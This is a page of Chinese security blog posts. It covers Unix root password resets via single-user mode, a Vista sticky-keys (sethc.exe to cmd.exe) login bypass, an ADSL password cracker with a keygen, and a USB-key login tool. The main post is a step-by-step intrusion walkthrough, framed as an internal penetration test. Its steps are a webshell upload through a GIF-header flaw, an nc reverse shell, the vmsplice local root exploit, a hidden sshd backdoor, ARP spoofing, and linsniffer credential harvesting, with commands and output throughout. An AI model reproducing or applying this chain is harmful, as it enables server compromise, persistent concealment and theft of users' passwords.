正在加载...
分页: 2/3 第一页 上页 1 2 3 下页 最后页 [ 显示模式: 摘要 | 列表 ]

Linux本地root密码破解

[ 2009/01/02 16:51 | by selboo ]
(一)RedHat/CentOS/Fedora 系统密码破解

1.在grub选项菜单按E进入编辑模式
2.编辑kernel 那行最后加上S (或者Single)
3.按B,启动到single-user mode
4.进入后执行下列命令
# mount -t proc proc /proc
# mount -o remount,rw /
#passwd
#sync
#reboot

(二)Debian linux 系统密码破解

1.在grub选项菜单'Debian GNU/Linux,...(recovery mode)',按e进入编辑模式
2.编辑kernel那行最后面的 ro single 改成 rw single init=/bin/bash,按b执行重启
3.进入后执行下列命令
root@(none)#mount -a
root@(none)#passwd root
root@(none)#reboot

(三)Freebsd 系统密码破解

1.开机进入引导菜单
2.选择每项(按4)进入单用户模式
3.进入之后输入一列命令
root@#mount -a
root@#fsck -y
root@#passwd(修改密码命令)
root@#root(要破解密码的用户名)
Enter new unix password:
root@#init 6 (重启)

(四)Solaris 系统密码破解

1.在grub选项菜中选择solaris failasfe 项
2.系统提示Do you wish to have it mounted read-write on /a ?[y,n,?] 选择y
3.就进入单用户模式
4.输入下列命令:passwd
root@#init 6 (重启)

(五)NetBsd 系统密码破解

1.开机:当出现提示符号并开始倒数五秒时, 键入以下指令:
> boot -s (进入单用户模式命令)
2.在以下的提示符号中
Enter pathname of shell or RETURN for sh:
按下 Enter。
3.键入以下指令:
# mount -a
# fsck -y
4.使用 passwd 更改 root 的密码。
5.使用 exit 指令进入多人模式。

(六)SUSE 系统密码破解

1.重新启动机器,在出现grub引导界面后,在启动linux的选项里加上init=/bin/bash,通过给内核传递init=/bin/bash参数使得OS在运行login程序之前运行bash,出现命令行。
2.稍等片刻出现(none)#:命令行。
3.这时输入mount -n / -o remount,rw 表示将根文件系统重新mount为可读写,有了读写权限后就可以通过passwd命令修改密码了。
4.这时输入passwd命令就可以重置密码了
5.修改完成后记得用mount -n / -o remount,ro将根文件系统置为原来的状态

Tags: , ,
来源:中国安全网
作者:vitter
blog:blog.securitycn.net

早就跟相关人员说过邮箱认证smtp和pop协议要做加密,否则在公司内网,太容易被人sniffer到明文密码了,另外邮箱密码和bbs公用,bbs也是采用的http协议,没有用https,这些都是问题。虽然我们控制的网络部分已经做过处理了,ip和mac地址做了绑定,即使有人做arp欺骗后,除非不出网关,否则欺骗后网络到达不了网关之外,因此嗅探明文邮箱密码已经不可能(由于邮箱服务器不在同一网段)。但是对于我们一些共用资源的服务器有公网ip和内网ip且处于一个相对风险较高,而且没有根据安全级别进行过相应的安全策略的网络环境内,因此一些问题是显而易见的,但是某些人根本不以为然。所以我进行了一次简单的内部渗透测试。

首先我从有公网ip和内网ip的网络段入手,如公网ip段是222.222.222.0/255.255.255.255,内网ip段192.168.0.0/255.255.255.0。

经过踩点发现222.222.222.77(192.168.0.77)上跑了一个老版本的某php的论坛。经过检测,存在上传漏洞,利用gif89a文件头欺骗漏洞上传webshell。然后上传个nst。
如图1

点击在新窗口中浏览此图片

利用tools里面的反弹连接:
首先在本地用nc -l -p 5546监听端口
如图2

点击在新窗口中浏览此图片

然后在nst上点Back connect
如图3(注意红色部分)

点击在新窗口中浏览此图片

成功登陆,
如图4

点击在新窗口中浏览此图片

图5

点击在新窗口中浏览此图片

在本地nc的窗口操作:

id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

权限低了点,可以利用前一段时间linux内核vmsplice本地提升权限漏洞。先用nst上传代码:
如图6:(注意红色部分,上传成功)

点击在新窗口中浏览此图片

回到nc窗口:
cp in.c /tmp
cd /tmp
ls
in.c
nst_c_bc_c.c
sess_af927ee319af5d5569b61ac520e53fcf
ssh-ZeOfP16753
tunl0

gcc -o in in.c

ls
in
in.c
nst_c_bc_c.c
sess_af927ee319af5d5569b61ac520e53fcf
ssh-ZeOfP16753
tunl0

/tmp/in
bash: no job control in this shell
[root@bbs111 tmp]# id
uid=0(root) gid=0(root) groups=99(nobody)
[root@bbs111 tmp]#

已经是root权限了,下一步上传俺修改过的常用的后门,这个以前写过 一篇文章介绍如何留后门的,这里就不叙述了(替换sshd和部分命令,可隐藏端口、连接、文件、进程等)。

擦擦pp,进行下一步我们的重点。

我们还是直接用后门sshd登录。还是ssh舒服点:)
如图7:

点击在新窗口中浏览此图片

在SecureCRT下利用rz命令上传我们用到的arpsniffer.c,然后编译:

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

报错,可能是没装libnet的缘故,看说明Make: first you must install "pcap" and "libnet" 确定arpsniffer.c需要先装pcap和 libnet。

[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz
[root@bbs111 root]# cd libpcap-0.8.1
[root@bbs111 libpcap-0.8.1]# ./configure
[root@bbs111 libpcap-0.8.1]# make
[root@bbs111 libpcap-0.8.1]# make install

准备工作已经ok。下面重新编译arpsniffer.c

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

这次没报错,编译成功。

[root@bbs111 root]# ./arpsniffer
====================================
============Arp Sniffer=============
==========Write by Paris-Ye=========
===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
===For example:
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)

[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
110
110
Get network cards mac address:
M-> 00:0e:a6:a5:80:4f
W-> 00:0f:e2:23:05:d0
S-> 00:d0:b7:88:07:59

Now Start... .. .

在另一个登录里面用tcpdump监听下:

[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11

发现有数据,把监听的数据存在文件里面:

[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。果然发现明文用户名和密码。

下面我们就可以用linsniffer监听我们想要的用户名和密码了。
先修改linsniffer.c:根据自己的需求监听相应的应用密码。我的如下:

if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include instead!

不用管警告,直接运行编译后的linsniffer即可。

[root@bbs111 root]# ./linsniffer

用户名和密码都自动存到了tcp.log下。如图8:

点击在新窗口中浏览此图片

经过测试后,我们把某人的用户名和密码发给某人,相信他再不会想当然的说sniffer不可能了。下面我们利用我们嗅探到的密码做个密码表,进行新一轮进一步的内网渗透测试。相信在我们根据渗透测试结果,进行相关安全技术改造和安全管理规范制度改造后,我们的网络的安全性会大大提升。







Tags: , ,

破解Vista密码

[ 2008/11/05 12:04 | by selboo ]
      我估计用Vista的用户越来越多,还有安装XP+Vista双系统的用户越来越多,不过总有些用户会忘记Vista账户密码。由于Vista采用比XP更为严格的登录认证,如果遗忘登录密码,我们是很难进入系统的。不过,微软在登录界面有一个粘滞键漏洞,可以用它来进入Vista,这个漏洞Vista之家团队在以前讲过多次了。

  粘滞键漏洞是指我们在登录界面按五下Shif启动粘滞键(系统目录下的sethc.exe),因此我们可以在XP下用cmd.exe替换sethc.exe启动命令提示符,然后利用命令提示符进入Vista重置账户密码。

  这里双系统假设为C盘为XP,D盘为Vista。

  第一步:进入XP系统后打开d:\windows system32,右击sethc.exe选择“属性”打开属性设置窗口,单击“安全”标签,接着单击“高级”。

  第二步:在高级属性安全设置窗口切换到“所有者”标签,在所有者列表选择当前XP登录账户,然后单击“应用”并依次关闭所有窗口。

  由于Vista的安装分区是NTFS格式,我们只有在XP下更改sethc.exe文件所有权后才能进行替换操作。如果属性窗口没有“安全”标签。需要打开资源管理器,单击“工具→文件夹选项”,在打开的窗口去除“使用简单文件夹共享(推荐)”前的勾选。



  第三步:同上再次打开sethc.exe的属性窗口并切换到“安全”标签,单击“添加”,把当前XP账户添加到“组或用户名称”列表,同时将该账户对sethc.exe的完全控制权限设置为“允许”。然后启动命令提示符输入下列命令进行替换操作:

  Rename d:\windows\system32\sethc.exe sethc1.exe(把粘滞键程序改名为sethc1.exe)

  Copy d:\windows\system32\cmd.exe d:\windows\system32\sethc.exe(复制命令提示符为sethc.exe)

  第四步:重启电脑登录Vista,在Vista登录界面按五下Shif启动粘滞键,这时启动的就是命令提示符界面,输入Explorer.exe启动桌面。成功加载文件后我们就可以看到开始菜单,这里是以系统内置SYSTEM账户启动的桌面(可以在开始菜单用户图标下看到)。
Tags: , ,

Adsl密码终结者2005+注册机

[ 2008/09/25 15:42 | by selboo ]
Adsl密码终结者2005--很老的一个工具了,
今天讲课用到了,就收藏下

文件: QiQi.exe
大小: 9204 字节
文件版本: 1.00
修改时间: 2005年6月1日, 0:24:14
MD5: C47C00042A08F548225FAB7D932F0516
SHA1: 44E82AA2986EAEEB774DA987A355B6F5E503B73D
CRC32: A4D0C267

文件: Setup.exe
大小: 3051385 字节
修改时间: 2005年5月27日, 13:52:36
MD5: 72D57EC0A6AB0E358223EE31A777A093
SHA1: 0435FBACBE458E7DC095DDC65947B0B5969E06FE
CRC32: 7E9124F9



用U盘进入有密码的系统

[ 2008/09/21 12:10 | by selboo ]
    U盘如今可以说非常普及了,不过,如果只是把它用来存储数据的话,也许有点可惜了。其实,我们还可以让U盘发挥更大的能量!例如,今天小编教你一招,能让你的U盘代替登录系统的密码,只有当你插上U盘才能正常进入系统操作,否则任何操作都无法进入系统。怎么样,是不是很有兴趣一试?

    要想成功实现上述功能,我们需要借助名为Disklogon的小工具,它是一个功能强大的安全设置工具,可让我们使用优盘、软盘等移动设备来登录系统,可在登录时免于输入用户名和登录密码;而一旦移走了这些设备,系统便可以设置为自动锁定或关机。下面就来看看如何设置让优盘变成控制登录系统的“密钥盘”。

    下载地址:http://download.pchome.net/utility/codeman/detail-20493.html

    完成软件安装之后按要求重新启动,之后在进入系统的画面中单击“Password”按钮,然后使用键盘输入密码登录(如果之前设置了使用密码登录的话)。但我们是不希望每次都这样繁琐的,下面就来设置一下让优盘发挥更强大的功能,让它直接来控制系统登录。

    直接开始菜单中单击“Disklogon Options”进入设置界面,随后依次执行如下步骤设定:

    Step1:依次执行“Options/Disklogon/Disks”操作,窗口右侧中默认将所有的盘符都勾选了,但我们只希望用优盘来作为密钥盘,所以只勾选优盘的盘符(例如笔者的为L:)。

    Step2:单击窗口左侧的“Options/DiskLogon/General”分支,接下来,我们要在右侧设置有优盘和无优盘时的不同操作

    1.在“Disk removal behavior”下拉列表框中选择“Lock computer when the disk is removed”(当磁盘被取出后将电脑锁定),这样当优盘被拔除后系统就自动锁定了;如果想在拔除优盘后自动注销,则可选择“Log off when the disk is removed”。

    2.在“Log on to Windows”下拉列表框中选择“Log on when disk is connected”(当链接有优盘时自动登录系统),这样,如果在开机后没有连接优盘,则不能进入系统。

    3.在“Unlock computer”下拉列表框中选择“Unlock computer when the disk is connected”(当连上优盘时自动解除对系统的锁定)。

    小贴士:默认情况下,系统登录时,如果没有没有连接优盘,用户可点击“Cancel”然后手工输入用户名和密码来进入系统。但为了增强安全性,去掉“Allow users to type their usename and password to log on or unlock computer”(允许用户输入用户名和密码来登录或解锁系统)选项!如此一来没有优盘插入就无法登陆系统了。控制系统登录之 创建登录信息

    Step3:完成上述设置后,我们就可以进行最后一步设置了,即登录系统解锁时所用的用户名和密码。点击进入“User Accounts”标签,随后点击“Change Logon information”区域处的“Change”按钮,进入用户名、密码创建界面(图2)。具体步骤:在“Step1”区域选择当前系统中正在使用的U盘,接着点击“Step2”区域选择某ID号(如01),此时“Create New”将呈现可用状态,点击该按钮,并在随后的弹出窗口中输入用户名及密码即可

    如果希望用加密算法对登录信息进行加密,可勾选对话框中的“Encrypt this logon information with strong encryption algorithm”选项。添加完成后单击“close”按钮返回主窗口。

    小贴士:设置了登录用户名和密码后,优盘根目录下会生成一个名为logon.dln的文件,这个文件不能删除!否则,下次重新启动时即使你插上了优盘,也会因为系统不能读取“指纹”而导致进不了系统!

    至此,所有相关设置已经完成,现在你的U盘就已经是密钥盘了。在没有连接优盘的情况下根本是无法进入系统的;而在系统使用中途,如果将优盘拔除,系统便会自动锁定—单击对话框中的“Unlock”也是无效的,除非再次将优盘连接到电脑中。目前软件只支持Windows 2000/XP/2003系统。

Tags: , ,
分页: 2/3 第一页 上页 1 2 3 下页 最后页 [ 显示模式: 摘要 | 列表 ]